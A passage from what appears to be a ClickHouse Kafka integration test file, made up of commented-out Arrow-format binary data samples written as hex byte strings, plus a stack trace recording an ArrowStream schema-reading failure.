00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00
\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00
\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# ],
# },
# 'ArrowStream' : {
# # Not working at all:
# # Error while opening a table: Invalid: Tried reading schema message, was null or length 0, Stack trace (when copying this message, always include the lines below):
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:117: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de0273f in /usr/bin/clickhouse
# # /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de026da in /usr/bin/clickhouse
# # /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de025ed in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0254a in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0165c in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# # /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# # /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# # /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# # /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# 'data_sample' : [
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00
\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
